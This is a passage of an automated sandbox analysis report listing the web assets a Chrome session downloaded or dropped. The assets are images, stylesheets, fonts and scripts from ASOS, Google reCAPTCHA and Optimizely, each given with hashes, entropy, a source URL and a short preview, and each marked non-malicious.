                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....`iZ.n.bbU.$.......9.=..$..x....9.C....t.....Qr....nv......H9..g...`w..).r.YIa...S.............g......}....E....o4.O.q......F....Q.S.,n........+.b..6P...r#.#.!.2I. .X....s..DutuF_).........9..1......b...HT..{.P<..(ls..,.s.......F.,.$9`..x.9.. e.....1h....=@m.=W8...9....cD.'...).6)....,y$t..........zy..^Ek.mQ......(.....`19..N.4FD..2.z......1....>....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):32
                                                                                                                                                                                                                                                                  Entropy (8bit):4.140319531114783
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:349T3XW2C2Y:cX5O
                                                                                                                                                                                                                                                                  MD5:A6F131CD11B533CE5F2B06CFD1FD4287
                                                                                                                                                                                                                                                                  SHA1:40B95F073BDD8322FD9A633C7ACB665C2EB300C5
                                                                                                                                                                                                                                                                  SHA-256:86153FC8D33E19C0841E27D73BF95F85B1B0CD9CE61F0494047EC16043F1575C
                                                                                                                                                                                                                                                                  SHA-512:A7529F76B77BE56B4BCE06EB01BD5F3E3F8E84A8DC6FBECE7F81AAA8F9FC92D6C81FBF370E72AAA9FD4065E01ED2C5A11C0762640620B151172095A761802D77
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlQUGpkgCvSWBIFDYOoWz0=?alt=proto
                                                                                                                                                                                                                                                                  Preview:ChQKEg2DqFs9GgQICRgBGgUImgEYAg==
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5725
                                                                                                                                                                                                                                                                  Entropy (8bit):7.91144168003325
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yE+h2f45qYHDf9krzEr//588m1nfBZ7EV59fpkSvmIJiTvPeh3:yq459jFOzE7545fBZyfRO4v3
                                                                                                                                                                                                                                                                  MD5:1D47DA8B602583C435B1755B377B6AE2
                                                                                                                                                                                                                                                                  SHA1:7304E9C5D55B88EE14EA8062827F2448215CDFBF
                                                                                                                                                                                                                                                                  SHA-256:B19A9A4C0DEEE1A04413D62A669C2B8FA18C34D1E0219C469CB789E53A69BBA4
                                                                                                                                                                                                                                                                  SHA-512:1B2CB11D385F610F9C0CC24B451CC6C668736C093F7D05B4994A4A4C0F468B8F00AA191D184FC2550517A2E47C44886DB10B2CD18BD86347EE8BC3D9AE392330
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..H.).tU8?|....=H9.<g.U.8.x.Y...........O..'.r.K)F.5...`....>...iD.y.H.'$.T... `...U.mh'........_U...-(..$Vfn..'.....Io.G......x.:.Fq....._.0G..ct;A...'.}.q@...Q.eV.s....l.....S)&.{#XA....-M+..H.....D}OV.dz..?.m%..G.\...+|.._..u.G...x..|.<...eV....}.[.p8=...Z......^|6.m....E..*...t.....P.M.....e.Zt*..[...8..p.br...y....._..j.....R..,.7p.B.pr.....#>
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5251
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9565996287313965
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:uAyv/RGhcSveQIh/15grzRsy7uc4zamdXWMjl/4Hs+Duixj2IRk4C:9mGyfQMNq7kamJ7JqTDvjlA
                                                                                                                                                                                                                                                                  MD5:60C9CC3825ADC832284FD90757C37ADB
                                                                                                                                                                                                                                                                  SHA1:9816C325E87F9C139C86C4CA26D364263E6B57CA
                                                                                                                                                                                                                                                                  SHA-256:4B2575CF62363CAD5DDEBDFB8CA4F8DA40156FFEF1754537E659CD023D806087
                                                                                                                                                                                                                                                                  SHA-512:CB8B478440C9CC8982CF0CFAA886E7EBB6CC01A71003F3DE2E3BA41E7DF55E8673AC9E805B1F84FF5EDC702B56986701FB215B56F63D3A6B00C53B4DD37D3F69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........=IDATx..].x.E...I2..M.#..$..11...l...*.....z....c.Y@].U....(.|..@.E...+.%..$wf.9....d2.. ...}_......~...{.^$......U..T.6...H=.iV+......NM.H.r.=..I54..2:..RHs.P...@.*.Gr6.-.Z..g..p......0...ix-.}....#b.e.$(.;!+.........l..f).).j..........M........1.,.[..@7....t.e.G..|zh....|w....{.~...Em-.+.....#]Q&...G....WZ&.z.....`.>.$..Xs....<..U.r....9..,.VA.....O//t_2.a...D.._.......Ua.........z:.k.K....B.......F....<.v.:;.j.%.>K...U.S/.._o:...D"A.c...<(..p.X.^^..~..dwm...N....^l..K ..k..~...{.....06..U.0k...V'(.I.F]Ih......."x.E.Rq5.....?:...=....#M(..A(.~.t9|....u..>...]...U.0...1p..prk...>...'.:.^...5..x%.:k...0Q.6......-J.........V...........uN..|.N+~Z"......9..j....4...:.....}.G.h.'..'$i..~3s....}.....x...)8........M.....}.........g....*.&.M_..<.*g..(..7W@..j..<{...O.....H._*..`..R..8_..R.. b.S..<.55F.y.g...C..`... #*.n..ByH...4....v-.0..a.P.C.S..]C...rBE.... .]..d.j.....w"=....j..&.!.`.x.V.vC..,<."Q.E..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (61743)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):61820
                                                                                                                                                                                                                                                                  Entropy (8bit):5.604462334629873
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:hYguL6CC4HxlK7AT5LHbOO5Q7O6kDW2A/pr7lQ:RCC4HxlK7qy7O6n97lQ
                                                                                                                                                                                                                                                                  MD5:E1FED5CB2080507CEC02ABFFD34AEA27
                                                                                                                                                                                                                                                                  SHA1:949810F40C57EC63B8A1EC55F12048EDA2BA1C80
                                                                                                                                                                                                                                                                  SHA-256:ADA7E3010D976A16FC38D2A03C40E315B503C964A8857FD826D5E845084D151E
                                                                                                                                                                                                                                                                  SHA-512:7A73AB20665D177CCCBFB1E2815402F3B9AD195A79D673D34F207FB63F68297741D4C916F25C40125C9C4E2CE17023756AD9763E7B03FD7D04F416A58DBF99CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.5e1a24317184f1ea8c00.css
                                                                                                                                                                                                                                                                  Preview:.PbFpbqr{font-family:futura-pt,sans-serif;font-size:.75rem;font-weight:900;letter-spacing:1.7px;text-transform:uppercase}.jFyrDfG{font-size:.875rem}.jFyrDfG,.w3QwoQC{font-family:futura-pt,sans-serif;font-weight:900;letter-spacing:2px;text-transform:uppercase}.w3QwoQC{font-size:1rem}.fVdHxMU{font-family:futura-pt,sans-serif;font-size:.875rem;letter-spacing:.4px}.ByM_HVJ{display:inline-block;line-height:2.14;text-decoration:none}.ojIeyOc{display:none;margin:0 auto;padding:0}.aR_DfXn{align-items:center;display:flex;height:50px;padding:0 16px}.ojIeyOc a{color:var(--11lcxa5);text-decoration:none}.ojIeyOc ol{display:flex;white-space:nowrap}.F28iPnp,.F28iPnp span{display:inline-block}.F28iPnp span{padding:0 11px 0 14px}.F28iPnp:last-child{overflow:hidden;text-overflow:ellipsis}.F28iPnp:last-child,.F28iPnp:last-child a{color:var(--10c6hzt);margin-right:5px}@media (min-width:768px){.ojIeyOc{display:block;max-width:1366px}.ojIeyOc:not(:empty){height:50px}.aR_DfXn{padding:0 24px}}@media (min-widt
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18298)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):18916
                                                                                                                                                                                                                                                                  Entropy (8bit):5.6453273959723
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:/K2+nG8EXuGyW8FuKW/00BlP8rbnPrlsi1yKnaeRF+yMfRGcL6ZEm2:/K2d8E+Gzr0uSrjlygaeD3ILaEr
                                                                                                                                                                                                                                                                  MD5:87F3F1784464A56B80F04D1C64FAC841
                                                                                                                                                                                                                                                                  SHA1:66ED80D249257F5352375A3F12103538963D7CFD
                                                                                                                                                                                                                                                                  SHA-256:A7EED1CAFB8953D9B44109950C9C7C48BF6DE295975693894A9D36F7AC9D266A
                                                                                                                                                                                                                                                                  SHA-512:6156B8B9CA66D7E360AC2E6201AA78F89D0CDBD1D473EFC6BFF7C6EE8C36C15944FDF60C62DB6FE9099830350F929ED0AEDB225A9082E5F91C4ABB052AFFA344
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/js/bg/p-7RyvuJU9m0QQmVDJx8SL9t4pWXVpOJSp0296ydJmo.js
                                                                                                                                                                                                                                                                  Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var z=this||self,L=function(f,b){if(f=(b=null,z).trustedTypes,!f||!f.createPolicy)return b;try{b=f.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(d){z.console&&z.console.error(d.message)}return b},T=function(f){return f};(0,eval)(function(f,b){return(b=L())&&f.eval(b.createScript("1"))===1?function(d){return b.createScript(d)}:function(d){return""+d}}(z)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var W=this||self,f4=function(f,b,d,T){for(d=(T=B(f),0);b>0;b--)d=d<<8|g(f);h(T,f,d)},g=function(f){return f.G?bK(f.Y,f):e(8,f,true)},B=function(f,b){if(f.G)return bK(f.Y,f);return b=e(8,f,true),b&128&&(b^=128,f=e(2,f,true),b=(b<<2)+(f|0)),b},TL=function(f,b,d){if(d=typeof f,d=="object")if(f){if(f instanceof Array)return"array";if(f instanceof Object)return d;if((b=Object.prototy
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (63485), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):68888
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1178772532048855
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:1Iyvfz9fG9ZzVt7zzwosL8zw/sLAzwCsL259soTYLZ4+j/o34ee2jIY1i4U6b6NR:pIpV9grleZd2HYLq+Toy2sIudz7f
                                                                                                                                                                                                                                                                  MD5:4378A9141BD7C4D9124B7BCF03F14E43
                                                                                                                                                                                                                                                                  SHA1:DBD10946E798756DDABA5B422DA035CFCBE56CEC
                                                                                                                                                                                                                                                                  SHA-256:52E8C1449696319E0FE4B379D68FB4A1E11D9AB61EDD85E2D8720ACF7BDF8C2E
                                                                                                                                                                                                                                                                  SHA-512:DDF10B0EFFBFFA3783CC59555B65F644B00FB494DEE3554F52CC60480F7148E64099EC0377F3C731A3AA980A10D68A5FA7990914423236220035B95C09505FAC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/translations.251ba614b8a464ef71b8.js
                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[856],{51578:(e,i,a)=>{a.r(i),a.d(i,{default:()=>v});var r=a(60141);const n=JSON.parse('{"accessibility_breadcrumbs":"br.dkrummer","accessibility_label_back":"Tilbage","accessibility_label_loading":"Indl.ser","accessibility_search_clear_text_button_description":"Ryd tekst","accessibility_skip_to_content":"G. til hovedindhold","asos_details":"ASOS-detaljer","burger_open_navigation_label":".bn navigationsmenu","country_selector_button_change_button":"Skift","country_selector_button_heading":"Shopper fra:","country_selector_button_locationtext":"Du er i","delivery_identifier_or":"Eller","dtc_atb_reservation_sellerchangemessage":"Vi har foretaget nogle lageropdateringer, og s.lgeren af din vare er .ndret. Den nye s.lgers priser og leveringstider kan v.re anderledes, s. tag et kig i din indk.bskurv.","errors_something_doesnt_look_right":"Hov! Der er noget galt.","footer_international_sites_label":"Nogle af vo
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 108876, version 1.0
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):108876
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996905089276648
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:3072:oStnFsevt5W01OhCH4lM/QB3518ws03Fefb3drbze4K:oSF7tI168yg38HS0fbxz6
                                                                                                                                                                                                                                                                  MD5:5F10D5A9BA21165359691916D39AF95E
                                                                                                                                                                                                                                                                  SHA1:043EC4C42885D63D6301B11E890EA9B9AA88F856
                                                                                                                                                                                                                                                                  SHA-256:EED2AA9E394C4DC2A764F5F756E759BC9B4A8114BAC97CE75305F8AA7F096F8E
                                                                                                                                                                                                                                                                  SHA-512:DF70D666171D91D8DD21EB1DCB7542ED5D2984C18A3E0CA7E8540B0B88FDC83DF7F0928B196FEF11B477591CA64FB29A6C76C37B44A02101B3F6FB3F93C99B84
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://fonts.wp.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZ1rib2Bg-4.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2.......L.......P......................................x.`?STATD.........$..n..P..6.$..J. ..n......[.V..R...>..g).I ..., ........(......T...>K.hp....k.5!.T...?..z.!..[.M[qQy+...............S..Q.w.Kw.hy.......N.`0!c5.6m.T.:%/.K....".)e .AR(e..Ztu1o@......2O.....<.I.*=uC..........|.+7.yvJs..g...j=..6~.sV1.,.......&..%..]...f..E..z\RsOo..T...[....].(]...RC.....w...s.;.N(...V....Y0V...$..%I.....O\.K ..F...evG...y?....!P...h.0%1x0. ...g..........=ry;...=.......e.IOF[. ...=a.ON-.:6g3..C.>.>=.e..K.C;...q.5.>.55..\.5,....c..K...WV.~.......W..gn.mV...'X(G..Hl.t.Fl.F$..".s<@.....&q.nP.`./".G.i.:...]...?`G`[..HW(.#..t.P..y.y.&.JW..v...Z..P..`1.+....j.Rj..&@.....@?...e.=.R.H...2Ujj."..k9KBV."!Ab....v.,.+6...-.rVR..=..2.w.]N.4.../X..[....c......w...1..k.7[E..I'.F..........Jt.....H....?3~.9........3...5...B.Y..+.i..B.s1....&....ll.R$..4..-..o8..l6....G..j.Ng,._...6.J.=.....u!.|.i-z.....-'..../r$.D.vq..$O_...I....i....m..hl...P%..7-.ge.f..;....^...]:...F.......
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5893
                                                                                                                                                                                                                                                                  Entropy (8bit):7.908596422163363
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEjS+972zZtnHzeOqT039gA7NLf0YwGQDc4weRwGRHQby+3oj:yV+9yzTzeOr6A7NL8BLc4wgwQQ2h
                                                                                                                                                                                                                                                                  MD5:9DADD5C1965AB4BC2363057E8722D279
                                                                                                                                                                                                                                                                  SHA1:97EFCA7F0C164BAC07A8460755F47EFA5872432C
                                                                                                                                                                                                                                                                  SHA-256:867F06D914DFB413127897B342548F58C0BDC64D4E91DFA72AF2B3E8DA10D313
                                                                                                                                                                                                                                                                  SHA-512:42518D4CE833302A061A5154BA9B9417F25DAAECD6E2A6873114A863F81E67EB7B2BD4F2C141C5A180CC54346126C2F608DF57D138716EF10C9B36FB6D6E5F00
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6aKgKXaVx0pzUyPhNpP81tC9vowwRIv_H5QEpw_3-VVjJAix-NPyxXGouAtmE_vTn4S_euGzGphYBBQHDxbQPANlvJA0FKUilBpXe45XLcNk7ElD-2BBdElX3zgpt8KT_nXNv4Nq9utVoF4ywsZvwR_z0gphSUFaSuQjnZENd_jRXJR1Pm2UFXwUh2k-4aITHgyHKtpHhb4bD9uwlpYOW4FhCp_w&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e2eca1451c1cfc28
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.-|s.{....IuKviK.......`..q...}tt..".V.'..5+....=....R......x..5.Q..h..W...3.....E...l.T..T6NG..L.g...."iY;t.F).=.c..V.5in.!...f.69....q..H.O.@.qI..,.p...Aj.c...5.,...G^...sj.q.^j..9,.W..*.....V...a...x..x.1..VM...O_..o.t......1,"m.......=n[h.[nt.].q..w...p..e.:.kH.....'\.2..eV.m..A..9.<..p....A.....=...nU..9...,q..3.^.km...i....c....1`..s...+x.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (31976)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):237598
                                                                                                                                                                                                                                                                  Entropy (8bit):5.541876874202883
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:uuVmMfnms+7IZV9U3c+68DjtB17hJ4KKW:uuVFc7IZVOFzDjtB17IKKW
                                                                                                                                                                                                                                                                  MD5:88BC94EBC5ED5FF8DD4F6BB388EA203C
                                                                                                                                                                                                                                                                  SHA1:780DA4EE83C4570394BE152F6410C302152F86A0
                                                                                                                                                                                                                                                                  SHA-256:CCB30C86CA83B1B077C2F35F5C1F06EC0B03ED3BFE4EADF1F4E3F20CAAF1FCC8
                                                                                                                                                                                                                                                                  SHA-512:864CB6BD67C4CB31CFD7412A306523C33B72CCB866B881D2C944122EB40BA7B9C10A964B80FF6067F3A71F1235056CAF6CEF8857216248B50FF21CEB54E62B32
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:function AppMeasurement_Module_ActivityMap(a){function b(a,b){var c,d,e;if(a&&b&&(c=g.c[b]||(g.c[b]=b.split(","))))for(e=0;e<c.length&&(d=c[e++]);)if(-1<a.indexOf(d))return null;return i=1,a}function c(b,c,d,e,f){var g,h;if(b.dataset&&(h=b.dataset[c])?g=h:b.getAttribute&&((h=b.getAttribute("data-"+d))?g=h:(h=b.getAttribute(d))&&(g=h)),!g&&a.useForcedLinkTracking&&f&&(g="",c=b.onclick?""+b.onclick:"")){d=c.indexOf(e);var i,j;if(0<=d){for(d+=10;d<c.length&&0<="= \t\r\n".indexOf(c.charAt(d));)d++;if(d<c.length){for(h=d,i=j=0;h<c.length&&(";"!=c.charAt(h)||i);)i?c.charAt(h)!=i||j?j="\\"==c.charAt(h)?!j:0:i=0:'"'!=(i=c.charAt(h))&&"'"!=i&&(i=0),h++;(c=c.substring(d,h))&&(b.e=new Function("s","var e;try{s.w."+e+"="+c+"}catch(e){}"),b.e(a))}}}return g||f&&a.w[e]}function d(a,c,d){var e;return(e=g[c](a,d))&&(i?(i=0,e):b(f(e),g[c+"Exclusions"]))}function e(a,b,c){var d;if(a&&!(1===(d=a.nodeType)&&(d=a.nodeName)&&(d=d.toUpperCase())&&j[d])&&(1===a.nodeType&&(d=a.nodeValue)&&(b[b.length]=d),c.a||
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1436), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1436
                                                                                                                                                                                                                                                                  Entropy (8bit):5.772642010255766
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:2jkm94/zKPccAjZy+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6QsLc:VKEcixKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                                                                                  MD5:6AC1AAC0E4A97806847BEBE09B43BFD8
                                                                                                                                                                                                                                                                  SHA1:448435E86E1C1106738999B419EB42E31A6C2033
                                                                                                                                                                                                                                                                  SHA-256:256A34EF09CBD3706D44C9225BAF1C1C129F9012499554D3E7812D21117F25A3
                                                                                                                                                                                                                                                                  SHA-512:1BDDA0622053FD0A92CDFDB94D4B36C7BE94A7E38B58EA549EBFC5797AA67909A2B6BE6817A65BF13C9326B306B3F179E453ABF84CDD62375C7BACAFF3CFD9F2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api.js?render=explicit
                                                                                                                                                                                                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):411041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.4978102551337
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:i77ivJMT/dwpHzKkrr28wIF41+HbzzVEAnLIcpXe2UmOmJzN6HyM:yw+2pukOFMH4IXe2S
                                                                                                                                                                                                                                                                  MD5:1293F68B6D7FAFE872CAB89205B32B23
                                                                                                                                                                                                                                                                  SHA1:9EE018E17198F1A7756EB268D81AA1C707BEED2A
                                                                                                                                                                                                                                                                  SHA-256:9876DD1B9851AE230ECF3E15D6C3B423EA2D259F5A490B55981FEF73A0EE9030
                                                                                                                                                                                                                                                                  SHA-512:6712643327683F8A20CE75B46388BD2487A1EAC2D0D21FEBDEA3B88704D0DB83650D5A8CA9622D80F543BF8DBE966B56E88A2BC3E3E49B9CA7584368F094F90B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://cdn.optimizely.com/js/19181552552.js
                                                                                                                                                                                                                                                                  Preview:/*! For license information please see client.min.js.LICENSE.txt */.(function(){var __webpack_modules__={5251:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendor",h="version",p="architecture",g="console",m="mobile",_="tablet",w="smarttv",y="wearable",b="embedded",E="Amazon",I="Apple",A="ASUS",T="BlackBerry",S="Firefox",k="Google",R="Huawei",C="LG",N="Microsoft",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},B=function(n,t){return typeof n===s&&-1!==z(t).indexOf(z(n))},z=function(n){return n.toLowerCase()},j=function(n,t){if(typeof n===s)return n=n.replace(/^\s\s*/,""),typeof t===u?n:n.substring(0,350)},G=function(n,t){for(var e,i,r,u,s,f,l=0;l<t.length&&!s;){var d=t[l],v=t[l+1];for(e=i=0;e<d.length&&!s&&d[e];)if(s=d[e++].exec(n))for(r=0;r<v.length;r++)f=s[++i],typeof(u=v[r])==
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (26411)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):26470
                                                                                                                                                                                                                                                                  Entropy (8bit):5.16276785278148
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:lyCFxjcg1z7R/Pnz7VE8rhxa1TKVazavCoU:HLz7fITgq
                                                                                                                                                                                                                                                                  MD5:77AC15A3412FAFAE305B89341B230CB9
                                                                                                                                                                                                                                                                  SHA1:B4F5B04037037550E1AE0DFD0934F69D30363477
                                                                                                                                                                                                                                                                  SHA-256:19AF2EEA404A881A23C39E7F5ADCD0EC43B9F84B96BAAA4862F6CB9444333861
                                                                                                                                                                                                                                                                  SHA-512:0636CC6525771F9CCB6904D3C9E568EC7374FDE9BACC4DDA6107D0A944C569E61AE053CB0F75740816333F71CF47290E933636E427810D776E49A7F5A76756D4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
